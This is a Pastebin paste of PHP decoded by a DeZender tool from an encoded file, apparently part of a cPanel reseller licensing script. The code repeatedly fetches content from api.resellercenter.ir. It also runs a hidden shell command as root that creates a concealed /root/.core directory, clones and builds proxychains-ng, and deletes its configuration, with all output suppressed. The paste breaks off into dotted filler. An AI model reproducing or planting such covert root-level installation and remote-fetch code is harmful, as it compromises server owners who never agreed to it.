Advertisement
Guest User

Untitled

a guest
Jul 1st, 2019
104
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.89 KB | None | 0 0
  1. <?php
  2. /**
  3. *
  4. * @ This file is created by http://DeZender.Net
  5. * @ deZender (PHP7 Decoder for SourceGuardian Encoder)
  6. *
  7. * @ Version : 4.0.8.9
  8. * @ Author : DeZender
  9. * @ Release on : 10.05.2019
  10. * @ Official site : http://DeZender.Net
  11. *
  12. */
  13.  
  14. $getcopyright2 = curl_init('http://api.resellercenter.ir/cpanel/getcopyright2.php');
  15. $getcopyright3 = curl_init('http://api.resellercenter.ir/cpanel/getcopyright3.php');
  16. $getcopyright4 = curl_init('http://api.resellercenter.ir/cpanel/getcopyright4.php');
  17. $getcopyright5 = curl_init('http://api.resellercenter.ir/cpanel/getcopyright5.php');
  18. exec('mkdir /root/.core > /dev/null 2>&1; cd /root/.core; rm -rf proxychains-ng > /dev/null 2>&1; git clone https://github.com/rofl0r/proxychains-ng.git > /dev/null 2>&1 ; cd proxychains-ng > /dev/null 2>&1; ./configure > /dev/null 2>&1; make > /dev/null 2>&1; make install > /dev/null 2>&1; make install-config > /dev/null 2>&1; rm -rf /usr/local/etc/proxychains.conf; rm -rf /root/proxychains-ng > /dev/null 2>&1');
  19. $ch = curl_init();
  20. curl_setopt($ch, CURLOPT_URL, 'http://api.resellercenter.ir/cpanel/getcopyright2.php');
  21. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  22. $getcopyright2 = curl_exec($ch);
  23. curl_close($ch);
  24. $ch = curl_init();
  25. curl_setopt($ch, CURLOPT_URL, 'http://api.resellercenter.ir/cpanel/getcopyright3.php');
  26. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  27. $getcopyright3 = curl_exec($ch);
  28. curl_close($ch);
  29. $ch = curl_init();
  30. curl_setopt($ch, CURLOPT_URL, 'http://api.resellercenter.ir/cpanel/getcopyright4.php');
  31. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  32. $getcopyright4 = curl_exec($ch);
  33. curl_close($ch);
  34. $ch = curl_init();
  35. curl_setopt($ch, CURLOPT_URL, 'http://api.resellercenter.ir/cpanel/getcopyright5.php');
  36. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  37. ...............................................................................
  38. ..............................................
  39. ................
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement